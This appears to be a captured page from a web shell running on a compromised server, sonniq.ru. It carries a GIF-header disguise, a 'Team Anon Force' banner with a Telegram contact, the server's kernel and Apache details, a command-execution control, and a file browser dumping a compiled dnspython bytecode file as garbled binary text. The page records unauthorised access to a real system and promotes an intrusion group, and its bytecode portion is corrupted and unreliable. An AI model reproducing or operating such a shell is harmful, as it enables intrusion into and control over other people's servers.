GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux sonniq.ru 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
127.0.0.1
/
lib
/
python3
/
dist-packages
/
dns
/
__pycache__
[ HOME ]
Exec
Submit
grange.cpython-310.pyc
o x7�_, � @ s d Z ddlZdd� ZdS )zDNS GENERATE range conversion.� Nc C s d}d}d}d}d}| r| d dkrt j�d��| D ]0}|dkr-|dkr-t|�}d}d}q|dkr:t|�}d}d}q|�� rC||7 }qt j�d | ��|dkrUt j�d ��|dkr^t|�}n |dksdJ �t|�}|dksnJ �|dkstJ �||kr~t j�d��|||fS )z�Convert the text form of a range in a ``$GENERATE`` statement to an integer. *text*, a ``str``, the textual range in ``$GENERATE`` form. Returns a tuple of three ``int`` values ``(start, stop, step)``. ���� � r �-z!Start cannot be a negative number�/� zCould not parse %szno stop value specifiedzstart must be <= stop)�dnsZ exception�SyntaxError�int�isdigit)�text�start�stop�stepZcur�state�c� r �,/usr/lib/python3/dist-packages/dns/grange.py� from_text s<